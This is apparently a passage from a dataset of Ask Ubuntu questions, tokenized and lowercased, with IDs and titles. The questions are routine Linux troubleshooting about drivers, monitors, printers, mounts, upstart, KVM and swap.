quotes ) . the initial part of the text would look like picasa : \x2f\x2fdownloadfeed\x2f ? url=http % 3a % 2f this needs to be replaced by picasa : //downloadfeed/url= ... ... .. that done , we revert back to the original steps and type in : `` c : \program files\picasa2\picasa2.exe '' url at the command prompt and all works as usual . as you guessed this does n't work either . so i 've found i can use downthemall https : //pricklytech.wordpress.com/2011/06/11/how-to-download-a-picasa-web-album-without-installing-picassa/ to download picasa album with firefox in ubuntu . it works ! but if i download individual picture each picture is of size around 8-9 mb while the ones downloaded with downthemall through rss feed are hardly around 1mb somewhere between 700kb to 950kb . so does picasa web album download gives you compressed pictures ( maybe windows user should answer this ) . if no then is there a way to download complete album in ubuntu .
84173	how to discover the queues in a ldp server	i 've a minimal ubuntu installation , and i 've heard that is possible to print to a ldp server directly with the lpr command : $ rlpr -- printer=hp4l @ foo.bar.orgfile.txt i know the lpd ip but not the queue name , so i wonder if exist a tool to request it to the ldp server , i 've seen that macos and ubuntu with cups are capable of guessing it .
84174	dpkg and equivs	i am trying to make a metapackage with equivs , creating the package is working perfect , but installing it is giving me an error : selecting previously deselected package testdeb . ( reading database ... 219619 files and directories currently installed . ) unpacking testdeb ( from testdeb_1.0_all.deb ) ... dpkg : dependency problems prevent configuration of testdeb : testdeb depends on apache2 ; however : package apache2 is not installed . dpkg : error processing testdeb ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : testdeb to fix that i have to run : apt-get install -f is there a way around this ?
84176	process that needs a volume starting before volume mounts	the destination for incoming crashplan backups on my server ( 11.04 ) is /media/seagatebig ( seagatebig is the volume name of my 2tb usb drive ) . when the server boots , two things happen : 1 ) seagatebig auto-mounts and 2 ) crashplan starts . the problem is , that often these two things do n't happen in that order . then i get : crashplan starts looks for /media/seagatebig does n't find it instead of waiting for it , creates it now it 's backing up onto my / filesystem . not cool . meanwhile , when seagatebig finally gets around to mounting , it finds that /media/seagatebig already exists , shrugs , and creates /media/seagatebig_ as its mount point . what i need is a way for the order to be enforced - where seagatebig mounts and then and only then the crashplan service is started . unless i learn that crashplan can be told to wait for its destination directory , never to create it ... which i am also investigating . but the crashplanengine script is installed by the product so i am loath to modify it , as i know i could by having it loop until df greps successfully for `` seagatebig '' . update : more research has led to asking a better question . see this one .
84180	overheating and fan noise problem on a toshiba portege r830-13c	i have an overheating and excessive fan noise problem with ubuntu 11.10 on a brand new toshiba portege r830-13c laptop . the laptop is dual boot with windows 7 , where i do n't have this problem at all , so i 'm assuming it 's an ubuntu issue . any ideas ?
84181	how can i set up dual monitors with nvidia ?	i just got a new computer ( w520 , graphics card nvidia gf106 [ quadro 2000 ] ) and installed ubuntu on it using wubi . i have everything working , so i wanted to set it up to be able to use two monitors with an extended screen . i figured i had to edit xorg.conf , but the file didnt exist . so i tried to create it by booting in recovery mode , and executing xorg -configure but i am getting these errors : ( ee ) failed to load module `` vmwgfx '' ( module does not exist , 0 ) ( ee ) vmware : please ignore the above warnings about not being able to load module/driver vmwgfx ( ++ ) using config file : `` /root/xorg.conf.new '' ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' ( ee ) [ drm ] no dricreatedpcibusid symbol number of created screens does not match number of detected devices . configuration failed . ddxsiggiveup : closing log any idea how i can get xorg -configure to work , so that i can have an xorg.conf file that i can edit to enable twinview ? why ca n't i boot with an xorg.conf file generated by nvidia-xconfig ? is there something in the generated xorg.conf file that might need editing ? i have an nvidia optimus technology which seems like it precludes me from running unity 3d . can i have dual monitors while running unity 2d ?
84182	jungledisk fails with libnotify error	has anyone had success getting the jungledisk application to work under ubuntu ? i installed it from the .deb file provided by jungledisk . the install goes fine , but i ca n't get the `` jungle disk desktop '' app to launch . it appears in the dash search bar , but does n't launch or do anything upon selecting it . when i try the command line , i get the following ... $ jungledisk -v -f verbose mode enabled shutting down ... $ i get something more interesting with the following command ... something about libnotify.so $ junglediskdesktop -v -f junglediskdesktop : error while loading shared libraries : libnotify.so.1 : can not open shared object file : no such file or directory does anyone have suggestions for what to try ?
84189	how to install asterisk 1.8 + freepbx 2.9 + nginx + php-fpm ?	how i can install freepbx 2.9 with asterisk 1.8 on ubuntu 11.10 ? the matter is that most tutorials and guidelines on internet are not well written and i get error messages when i do amportal start . an extra difficulty is that there are no guidelines in case i use nginx/php-fpm . all tutorials are for apache .
84197	magic trackpad - ubuntu	i 've been using a mac in my job for a while now . the only feature i like about it above my ubuntu ( on an hp ) is the trackpad . i love doing the strokes to move between different files . it really makes things quicker . is it possible to imitate this feature on my ubuntu laptop ? ( like maybe there might be something that utilizes my mouse pad on the laptop , as well as the scroller ) if that is impossible or does n't exist then can i set up a magic trackpad to work on ubuntu on my hp ?
84198	' '' windows backend object has no attribute 'iso-path ' - see log for details . ' error when trying to install	i am trying to install ubuntu 11.10 in windows xp , everything went as before until the countdown clock reached zero , then i got `` windows backend object has no attribute 'iso-path ' - see log for details . it 's done it three times now . ( formatting in between ) the end of the log says ====== 11-01 17:20 debug tasklist : new task check_iso 11-01 17:20 debug tasklist : # # # running check_iso ... 11-01 17:20 debug commonbackend : checking y : \ubuntu\install\installation.iso 11-01 17:20 debug distro : checking ubuntu iso y : \ubuntu\install\installation.iso 11-01 17:20 debug distro : wrong size : 8094031872 > 900000000 11-01 17:20 debug tasklist : # # # finished check_iso 11-01 17:20 error tasklist : 'windowsbackend ' object has no attribute 'iso_path' traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 579 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 565 , in use_iso attributeerror : 'windowsbackend ' object has no attribute 'iso_path' 11-01 17:20 debug tasklist : # cancelling tasklist 11-01 17:20 debug tasklist : # finished tasklist 11-01 17:20 error root : 'windowsbackend ' object has no attribute 'iso_path' traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 130 , in select_task file `` \lib\wubi\application.py '' , line 205 , in run_cd_menu file `` \lib\wubi\application.py '' , line 120 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 579 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 565 , in use_iso attributeerror : 'windowsbackend ' object has no attribute 'iso_path'
84199	how to remove linux mint at grub ?	i installed linux mint manually . now i removed it but at the time of boot screen it is showing '' linux mint 12 flubox , 3.0.0-13-generic ( /dev/sda5 ) '' '' linux mint 12 flubox , 3.0.0-13-generic ( /dev/sda5 ) -recovery mode '' and when i boot up it shows the login screen of linuxmint . but login screen do't have option to login to linux mint it has option for only ubuntu it means the linuxmint is removed . how i can get back my default ubuntu login screen and ubuntu boot up ? i think at the time of installation of linuxmint i allowed linux mint desktop environment and replaced ubuntu desktop enviroment .
84200	can not move monitors between monitors	i have 2 nvidia graphic cards installed in my desktop and i have connected 4 monitors to the machine . i have activated and enabled all four at the correct resolution using the `` nvidia x server '' gui editor , but i ca n't move a window from 1 display to another . how can i do this ?
84213	btrfs defragmentation of files/folders	i have just installed ubuntu 11.10 on the btrfs filesystem and i want to ask a question about defragmentation of files . do i really need to defragment files or the whole system ? defragment # btrfs filesystem defragment /pool1 defragment btrfs defragmentation
84214	how do i install a driver for a brother mfc-j270w printer ?	i own a brother printer/scanner , model mfc-j270w . i 'm running on both a sony vaio laptop with ati graphics and a core i5 , and an older dell desktop with a core 2 duo . i had no problems installing it on ( k ) ubuntu 11.04 , but now on 11.10 i 've had horrible trouble installing it in either 64-bit , or 32 bit . i do n't exactly remember what i did last time to install the driver , but i believe i did the same thing i 've done this time around . i downloaded the easy copy-to-the-terminal text ( which can be found here : http : //welcome.solutions.brother.com/bsc/public_s/id/linux/en/faq_prn.html # f00090 , made an sh file with the text , and ran it as root . i 've had no luck with it so far . one of my main questions is , when i run the sh file , it asks me if i 'm going to enter my device uri . i have n't yet found the uri of the printer , and would n't know where to look . so , if anyone can help , i would appreciate either a link to another driver download that will work without too much technological know-how ( i can do simple bash commands , but have yet to learn how to install tar.gz app packages ) or a different solution to my problem . thanks : - ) if it matters , i never installed the driver on my linux partition on the laptop , because only 32-bit support had been released by brother at the time .
84218	ubuntu 11.10 desktop sharing resolution	i have 11.10 running on a netbook with unity2d @ 1024x600 resolution . i vnc into my ubuntu netbook from win7 @ 1920x1200 . is there a way make desktop sharing on 11.10 run at a resolution higher than the hardware resolution ? i am not too worried about speed/lag . 1440x900 would be perfect . i like to keep my machine as clean as possible , i could add eg . vnc4server but i 'd prefer not to do that . i have looked for but can not find an appropriate vino-server config file . thank you .
84222	is it possible to add actionable gtkwidgets in the menu of an appindicator ?	is it possible to add actionable gtkwidgets in the menu of an appindicator ? for example if the widget contains an image , text and two actionable buttons .
84226	installed 11.10 , but it 's not detecting all 8gb of ram , only 3.9gb . bios sees 8gb	just installed 11.10 , but it 's not detecting all 8gb of ram . system info says there are 3.9gb . bios does n't have a problem recognizing all 8. free -m results in : total used free shared buffers cached mem : 3957 1478 2479 0 22 687 -/+ buffers/cache : 768 3189 swap : 4089 0 4089
84232	sudo apt-get install returns a 404 error but ping returns packets . is it a problem with my network configurations ?	i 'm trying to install openjdk on an ubuntu 11.04 vm in a mac . however , i 'm running into 404 errors on the command line which i ca n't diagnose why . sudo apt-get install openjdk-6-jre-headless ... err http : //ph.archive.ubuntu.com/ubuntu/ natty-updates/main openjdk-6-jre-lib all 6b22-1.10.2-0ubuntu1~11.04.1 404 not found [ ip : 10.16.3.143 8080 ] err http : //ph.archive.ubuntu.com/ubuntu/ natty-updates/main tzdata-java all 2011g-0ubuntu0.11.04 404 not found [ ip : 10.16.3.143 8080 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main openjdk-6-jre-lib all 6b22-1.10.2-0ubuntu1~11.04.1 404 not found [ ip : 10.16.3.141 8080 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main openjdk-6-jre-headless i386 6b22-1.10.2-0ubuntu1~11.04.1 404 not found [ ip : 10.16.3.141 8080 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main icedtea-6-jre-cacao i386 6b22-1.10.2-0ubuntu1~11.04.1 404 not found [ ip : 10.16.3.141 8080 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main icedtea-6-jre-jamvm i386 6b22-1.10.2-0ubuntu1~11.04.1 ... but if i ping ping 10.16.3.141 ping 10.16.3.141 ( 10.16.3.141 ) 56 ( 84 ) bytes of data . 64 bytes from 10.16.3.141 : icmp_req=1 ttl=63 time=1.55 ms 64 bytes from 10.16.3.141 : icmp_req=2 ttl=63 time=3.22 ms 64 bytes from 10.16.3.141 : icmp_req=3 ttl=63 time=4.00 ms 64 bytes from 10.16.3.141 : icmp_req=4 ttl=63 time=174 ms 64 bytes from 10.16.3.141 : icmp_req=6 ttl=63 time=4.16 ms 64 bytes from 10.16.3.141 : icmp_req=7 ttl=63 time=2.19 ms 64 bytes from 10.16.3.141 : icmp_req=8 ttl=63 time=4.98 ms 64 bytes from 10.16.3.141 : icmp_req=9 ttl=63 time=3.81 ms 64 bytes from 10.16.3.141 : icmp_req=10 ttl=63 time=6.09 ms 64 bytes from 10.16.3.141 : icmp_req=11 ttl=63 time=3.89 ms 64 bytes from 10.16.3.141 : icmp_req=12 ttl=63 time=3.86 ms 64 bytes from 10.16.3.141 : icmp_req=13 ttl=63 time=0.009 ms 64 bytes from 10.16.3.141 : icmp_req=14 ttl=63 time=3.99 ms ^c -- - 10.16.3.141 ping statistics -- - 14 packets transmitted , 13 received , 7 % packet loss , time 13047ms rtt min/avg/max/mdev = 0.009/16.610/174.132/45.496 ms any ideas ? is this my network 's problem ?
84233	11.10 7600gt display error	so i used to use ubuntu back when it was 8 and it never gave me any problems but recently i did a fresh install of 11.10 . but now when i install the n-vidia restricted drivers i cant change my screen resolution from 640x480 , the display menu says `` can not detect display '' . there is no way to navigate the screen really because the windows do n't work and i 'm not very command prompt keen please help i love ubuntu !
84236	is there a way to share a folder with a mailing-list like a google-group ?	i need to share a folder of documents with the members of a google-group . is there an easy way to specify that ( other then just listing manually the email addresses of each member of the group ) ? it would be nice if it will also handle dynamic changes to the list ( that is , will automatically share new members added to the group ) . ( google-docs does that , but being a user of ubuntu one means that it would be easier for me if this functionality could be achieved with u1 ) .
84237	how to remove meta tracker integration in nautilus	i installed tracker to index some of my files , however it seems that this application integrated well in nautilus and i want to remove this integration as unnecessary . problem is that i use nautilus search bar to search for filenames , so when i type some filename i 'm looking for , this task is processed through tracker and i get totally irrelevant results . how can i remove tracker integration from nautilus , without removing tracker itself ? first comment on https : //wiki.ubuntu.com/tracker ( after `` how to disable tracker globally '' - which i do n't want ) describes this same problem i also posted this on tracker mailing-list linking to this question , but no one replied .
84239	import pst in evolution 3.2.1	how can i import a pst from windows 2007 into ubuntu 11.10 's evolution 3.2.1 ?
84241	undecorate chromium browser in kde4 ?	chromium browser in kde4 looks bad , unlike other wm , a border showed up on top , how can i remove them , and let chromium display its own buttons ( e.g close / max / minimize ) ? thanks !
84244	how to make dash load faster in unity-2d	my dash always takes 10-15 seconds to show up . is there a way to make it stay permanently loaded in the ram or something so that it shows up faster ?
84246	is it possible to have the same effect of the alt f2 like gnome shell	i was trying gnome shell ( in opensuse ) and found out that when i do the old alt + f2 and the old execute command is now a small black space to complete ... i want that on lubuntu . somebody know how to do that ?
84247	is it possible to have both desktop cube and unity ?	i recently learned that few things in compiz conflicts with unity , hence unity crashes when ccsm is installed . is it possible by anyway , to have both ? ( i badly love both unity launcher and desktop cube )
84248	recommendation for a download accelerator for chromium	firefox is very heavy , so i want to use chromium but it does n't have a download accelerator ( multisegmented ) like firefox 's downthemall ! what can i do ?
84252	just installed ubuntu 11.10 . looking for a nice , easy to install theme	i do n't like the current theme , or this dock on the left side . i 'm looking for a nice glassy or chrome theme , that is not a port of osx or windows . i guess if i get instructions for how to install one , from there i 'd be able to find others . so if anyone can walk me through installing a relatively simple theme , maybe with a nice dock , i 'd really appreciate that .
84255	recommendation for a non-programmer 's guide to self-teaching python	i am new to ubuntu and to programming , and i am seeking to teach myself python . i installed the software from the software center and was wondering how to be sure it is up to date with the latest python and where to go online for a guide that you would suggest , such as non-programmer 's tutorial for python 3 .
84263	one click access to bookmarked files ?	on my windows machine with just one click i can launch favourite or bookmarked files that i use on a daily basis , which is a great time-saver . is there any way to do this with 11.10 unity ? ideally i would like to right-click on an icon in the launcher and have a list of files appear that i could then left-click to launch , but i 'd be happy for any simple solution . please note that i am not referring to recently used files lists - these do not work at all because the bookmarked file will always drop off the bottom of any recently used file list .
84265	recover windows after ubuntu install	hi i have installed windows xp and after that i got disk error while installing ubuntu so i installed using new cd disk now after successful installation of ubuntu i did n't get grub menu it straightaway goes to ubuntu without showing windows list .
84270	ov2640 webcam not detected	after much research ang googling , my web cam is still not recognized . in the time of ubuntu 11.04 it was working fine . i did a fresh install of 11.10 and not more web cam . all the cheese and camera monotor and v4l tests and all failes with `` can not connect to /dev/video0 or equivalent . the output of 'lsusb ' shows the webcam bus 001 device 002 : id 05a9:2640 omnivision technologies , inc. ov2640 webcam what i noticed is that neither /dev/v4l nor /dev/video* exists . if i re-install the v4l package all the /dev/video* are created , but no /dev/v4l if i reboot the /dev/video* are not created . i think the trouble is that the device are not created at boot time . i have a dell inspiron 1525 and until this fresh install the web cam worked fine . can somebody help ?
84277	can not lock '/etc/group ' in recovery mode	i 've currently booted into recovery mode , because i removed my sole user from admin : / when i run adduser oadams admin , i get gpasswd : can not lock /etc/group ; try again later . for what it 's worth , ls /etc/ | grep `` lock '' , returns only mtab.fuselock , so there 's nothing to delete . how can i get my user back in the admin group ?
84278	how can i easily turn a network mount in nautilus into an fstab entry ?	so i have navigated to the network share via nautilus , but now i want to make it a permanent mount that is maintained between reboots . how can i easily add this share to the /etc/fstab file ? by easy i mean right clicking on the share i want to link in and choosing something like `` map network drive '' ! i do n't know the details of the machine that holds this share and that is why i have been using nautilus to browse the network for it . right clicking on the share in nautilus and viewing properties does not seem to give me enough information for an fstab entry . please can you tell me how to achieve this ?
84279	how to change directory using script	i have this script # ! /bin/bash cd /home/user/somedir pwd it works as expected , but i would like this script to transport me to /home/user/somedir , but i stay in the same dir . how to write script that will transport me ( in gnome-terminal ) to /home/user/somedir ?
84280	unable to connect two ubuntu systems	i just got my new thinkpad x121e and installed ubuntu 11.10 ..everything is fine , except i ca n't get my data from my old eeepc ( ubuntu 10.4 ) to my new baby . the eeepc says it could not mount ubuntu 11.10 i386 because : error mounting : mount : wrong fs type , bad option , bad superblock on /dev/loop0 , missing codepage or helper program , or other error ( could this be the ide device where you in fact use ide-scsi so that sr0 or sda or so is needed ? ) in some cases useful info is found in syslog - try dmesg | tail or so what is wrong ? how can i fix it ? thanks ! ! lisa
84281	unable to start gwibber	when i start gwibber , i get the following errors : ( gwibber:2176 ) : glib-gobject-warning ** : g_object_set_property : object class `gwibberaccount ' has no property named `uid' ** ( gwibber:2176 ) : debug : streams.vala:199 : getting non-transient model ** ( gwibber:2176 ) : debug : streams.vala:201 : stream_model from resources has 338 rows ( gwibber:2176 ) : gtk-critical ** : gtk_radio_button_set_group : assertion ` ! g_slist_find ( group , radio_button ) ' failed ( gwibber:2176 ) : glib-gobject-warning ** : g_object_set_valist : object class `tabwidgetsbutton ' has no property named `draw-indicator' ( gwibber:2176 ) : gtk-critical ** : gtk_widget_show : assertion `gtk_is_widget ( widget ) ' failed ( gwibber:2176 ) : glib-gobject-warning ** : g_object_set_property : object class `gwibberaccount ' has no property named `uid' ( gwibber:2176 ) : gtk-critical ** : gtk_radio_button_set_group : assertion ` ! g_slist_find ( group , radio_button ) ' failed ** ( gwibber:2176 ) : debug : tab-bar-widgets.vala:302 : facebook not supported ( gwibber:2176 ) : glib-gobject-warning ** : g_object_set_property : object class `gwibberaccount ' has no property named `uid' ** pango : error : /build/buildd/pango1.0-1.29.4/./pango/pango-layout.c:3630 : process_line : assertion failed : ( result == break_some_fit || result == break_empty_fit ) aborted ( core dumped ) how do i fix it ?
84282	keyboard shortcut editor does not intercept keypresses	i 've been using suckless dwm for years and i really need to make the shortcuts look alike to feel at home ; ) on ubuntu oneiric , the keyboard shortcut editor is opened with : system settings - > keyboard - > shortcuts . the help in the window specifies : 'to edit a shortcut , click the row and hold down the new keys or press backspace to clear' so i select the first row of the 'navigation ' section and highlight 'move window to workspace 1' then i hold down ctrl+alt+1 for ten seconds but nothing happens . the shortcut still appears as 'disabled ' . i 'm unable to set any shortcut , i 've tried many combinations . for example , a combination with super key will be intercepted by unity instead of being catched by the keyboard shortcut editor window . can anybody reproduce this with oneiric ? what am i doing wrong ?
84289	how can i install when receiving `` msg root drive not installed '' ?	when i try to install ubuntu 11.10 , i get the message `` root drive not installed '' . how can i resolve this ?
84291	why firefox asking for the master password frequently ?	i am using a master password to protect my saved password in firefox . however , firefox is asking for the master password in approximately one hour periods . is this normal ? i thought it was normal to ask only when changing , adding , or try to see a saved password . here some `` about : config '' values @ bruno pereira asked : privacy.cpd.passwords = false security.ask_for_password = 0 security.password_lifetime = 30 services.sync.engine.passwords = true sync.log.logger.engine.passords = does not exist installed add-ons : adblock plus downthemall flashgot ubuntu firefox modifications
84293	upstart does not correctly start service ( or kills it instantly )	i am trying to use upstart to start a daemon on the `` input-device-added '' event , however if someone knows of a different method to start something on the same event that does n't involve upstart i would be very pleased too . anyway , when the input-device-added event is emitted myservice.conf gets called correctly and the first few lines of script get parsed . but when the daemon gets launched it never completely starts running and upstart seemingly kills it prematurely . i 've tried using upstart in two different ways , both give me the same problem : author `` anvowido '' start on input-device-added script device='printinputdevices | grep thecorrectdevice' echo $ device /start/my/daemon -option device end script and also author `` anvowido '' start on input-device-added exec myscript.sh where myscript.sh file contains the script above . the echo command in there is just for diagnostics and outputs correctly in both methods . running myscript.sh from terminal will start the daemon perfectly fine with all the expected output . the same is true for running the `` /start/my/daemon -option device '' command , both will output something along the lines of device 0 : /dev/input/event9 mydevice display name : :0 but when launching it from upstart ( with service myservice start or by plugging in a new input device ) the output halts midway 'display name : :0 ' and only logs 'display name : ' at which point upstart kills the process . it looks to me like the double colon in the output is the culprit ( or of course the :0 ) , and perhaps upstart mistakes it for an error code of sorts ? anyone know of a different method of starting my service at the correct moment ? perhaps i have missed something stupid and obvious while making the upstart conf file which can be fixed ? lastly maybe upstart can in some way be convinced to ignore the `` : :0 '' in output ( if this really is the cause of course ) and keep running the daemon ?
84294	how-to add cpufreq indicator to system tray	i installed cpufreq indicator from the ppa : artfwo/ppa repository . the cpufreq started and i see it by system monitor but i ca n't see him in system tray . what can i do to fix it ?
84299	how-to enable x forwarding in putty	i have ubuntu next to windows7 , i am always using ubuntu to connect remotely other computer . i use -x option to enable the gui . on win7 i 'm using putty , how do i enable x forwarding ?
84301	initrd.lz lzma extract error	i am trying to extract the initrd.lz from the casper folder lzma -dc -s .lz initrd.lz | cpio -imvd -- no-absolute-filenames and i get this message : lzma : decoder error cpio : premature end of archive i am using ubuntu 10.10 , is there another command to extract lz files ? am i missing a parameter ? what can be the issue ? thanks
84303	how-to make file have different color when doing ls ?	when i execute command ls it displays files and folders . folders are typed in light blue . i would like to have xml files types in pink color . how to do it ?
84310	how to sync my bookmarks with chromium from a usb flash drive ?	just downloaded ubuntu 11.10 and i have all my chrome bookmarks saved on my usb flash drive . how do i sync them with chromium ?
84311	loading kvm amd module fails	i want to use qemu+kvm on ubuntu 11.10 oneiric but virt-manager warns that kvm is not loaded and performance will suffer . the problem may depend on the fact that sudo modprobe kvm-amd fails with error fatal : error inserting kvm_amd ( /lib/modules/3.0.0-13-generic/kernel/arch/x86/kvm/kvm-amd.ko ) : operation not supported eventhough sudo modprobe kvm succeeds without warnings . what is wrong ?
84313	is it safe to remove gnome-session on a clean ubuntu 11.10 install ?	i want to replace nautilus with pcmanfm on a clean ubuntu 11.10 install . removing nautilus will remove gnome-session as well though , and i 'm not completely sure about this . is it safe to remove gnome-session ?
84314	set up offline ubuntu repository	i 'm in a bit of a pinch ! i have bunch of ubuntu hosts ( 10.04 ) on a network that never sees the internet . i need to be able to install software on these hosts but obviously do not have access to an ubuntu repository . i 've spent some time searching online but can not find a tut on how to create an offline ubuntu repository . my question is two fold : 1 ) . how do i set up an ubuntu offline repository and point a host to it ? 2 ) . is there an easy way to use a windows host to download an entire ubuntu repo . ( i have a windows host with an internet connection ) .
84318	how do i create a swap partition for hibernation ?	while installing ubuntu 11.10 a months ago i had not allotted any swap space , i now came to know that there would be no hibernate option without swap space . is it possible to do it now ? , what if the drives mess up ? i have 4 gigabytes of ram , a 500 gb disk and i 'm dual-booting with windows 7 .
84320	ubuntu needs swap , why not windows ?	ive learned that one should allot a swap space inorder to have hibernate option in ubuntu , why isnt it same with windows ? my win 7 doesnt have any swap space but still hibernates without a glitch .
84324	password reset disk	i use windows 7 as my secondary os and it has an option for creating password reset disk i.e . a flash drive when inserted to a locked win 7 ( in case password is forgotten ) , would reset the system password and open the system for the user . is it possible to make something like that for ubuntu 11.10 ? ? ? ?
84332	how can i install manycam or a manycam equivalent in ubuntu 10.04 ?	i am wondering if there is an ubuntu equivalent to the manycam program or if there is some way i can get manycam to run in ubuntu . ideally , does this program have the same features as manycam ? can you recommend the software , have you used it before ?
84333	how do i use a specific ami for juju instances ?	i would like to use another ami with juju instead of the default ami , where do i specify this ?
84336	global menu hides window decorator from startup applications	i am using 11.10 with unity . when i set e.g . thunderbird as startup application , it will start just after login , but it will be not maximized placed with its window decorators just beneath the global menu , so i am not able to move the window down . i do n't know where to search on launchpad for that . is it just me having these troubles ? btw : i also enabled the proposed update repo .
84337	why is this happening to me with the source in ubuntu 11.10 ?	i problem after problem ... i spend above and it has happened again , i pungo an image with what happens to me , with some letters on the screen i get a horizontal grating that prevents me from seeing the letter in comfort and fluency , i passed in the browser firefox and also throughout the system , configuration , applications , etc.. i hope you can solve the problem as soon as possible , it is a burden and uncomfortable to see the letters as well . a saud and thanks .
84341	simple voice chat application for yahoo in ubuntu 11.10 ?	i just need a simple voice chat via yahoo . i tried empathy , kopete , pidgin and read several forums , but none helped . can anyone give me a hint how can i make a simple audio call via yahoo in ubuntu 11.04 ? thanks : )
84342	terminal not opening	what i did is ... in terminal profile i added command sudo su - ... so when terminal open it automatically execute sudo su - command ... this was working fine and when i open terminal i loged as root ( sudo su - ) what i did is in terminal profile i added `` sudo su - , cd desktop `` now my terminal is not opening ..i think it open and close very quickly is there any other way to fix my terminal profile .. i am using ubuntu 11.10 .bashrc # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines in the history . see bash ( 1 ) for more options # ... or force ignoredups and ignorespace histcontrol=ignoredups : ignorespace # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi after restarting my pc its still there . & i have unchecked as shown in pic when i reset it ..it reset ... after when i open gconf again its still there & by the way terminal is opening working fine
84344	internet becomes unavailible after connecting through vpn	i am connecting to vpnc which breaks my internet connection . i understand , that this is because all my traffic is forwarding to vpnc now , so the problem is about routing . so , how can i manage my routes so only one port ( 1433 ) will use vpnc and all other connection wo n't pass traffic through vpn
84348	is the power regression/overheating bug fixed in kernel 3.2 ?	has this issue been dealt with in the latest kernel 3.2 ?
84349	how do i get an nvidia geforce 310m working ?	i have nvidia geforce 310m ( hybrid ) graphics in my samsung qx 410s02 laptop . i installed ubuntu 11.10 . before installing mesa-utils , in the section `` system info '' , the graphics driver was listed as unkown , but now it displays intel速 ironlake mobile x86/mmx/sse2 and the experience in standard . and i am not being able to use all the compiz or unity effects . the nvidia graphics card is based on optimus technology . i installed the proprietary softwares and configured the nvidia settings using sudo nvidia-xconfig and when i restarted the computer , it got stuck somewhere an like anarc ( h ) ... ... ..so i again installed ubuntu 11.10 . i searched for the problems , and they said that nvidia optimus is not supported . now , i want to know , is there any process to enable all the compiz and unity effects in my computer . which graphics card should i use ( nvidia or intel ) and what is the process or commands do i need to follow ? ? please help me ... ..
84351	open source app for mounting , extracting , creating isos	i really need a open source app that can handle : mounting of iso extraction of iso creation of iso from a real cd/dvd
84353	gnome 3 theme fallback	recently i noticed this issue about gnome 3 themes ( see attached screenshot ) . edit : gnome shows some default gtk theme , instead of the configured one like ambiance . this happened after gnome-accessibility-themes has been updated . how to solve this ?
84354	how to enable 3d acceleration with an nvidia geforce gt 540m	i have nvidia geforce gt 540m . i have a problem with `` 3d acceleration '' . every game i install tells me `` you do n't have 3d acceleration '' . what can i do to enable 3d acceleration on my computer ?
